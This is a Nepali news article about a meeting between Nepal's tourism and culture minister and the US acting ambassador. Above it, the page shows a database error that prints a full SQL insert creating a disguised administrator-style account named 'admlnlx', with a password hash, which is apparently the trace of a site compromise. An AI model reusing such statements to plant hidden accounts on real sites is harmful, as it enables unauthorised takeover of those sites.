WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BE1.WVDxarPQJqIknlgZSi5h8NaKmi0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-17 09:33:39', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । संस्कृति, पर्यटन तथा नागरिक उड्डयनमन्त्री प्रेमबहादुर आलेसँग नेपालका लागि अमेरिकी कार्यवाहक राजदूत म्यानुयल मिक्यालरले आज शिष्टाचार भेटवार्ता गरेको छ ।
सिंहदरबारस्थित मन्त्रालयमा भएको सो भेटमा द्विपक्षीय सम्बन्धका विविध विषयमा कुराकानी भएको मन्त्री आलेको सचिवालयले जनाएको छ ।
सो भेटवार्ताका क्रममा मन्त्री आलेले अमेरिकी सरकारले नेपालको विकासलगायतका विविध क्षेत्रका साथै कोरोना भाइरसविरुद्ध लड्नका लागि गरेको सहयोगको सराहना गरे ।
कार्यवाहक राजदूत मिक्यालरले नेपालमा पर्यटन प्रवद्र्धन, कला संस्कृति तथा नागरिक उड्डयनका क्षेत्रमा अमेरिकाले गर्दै आएको सहयोगलाई निरन्तरता दिने बताउनुभएको थियो । रासस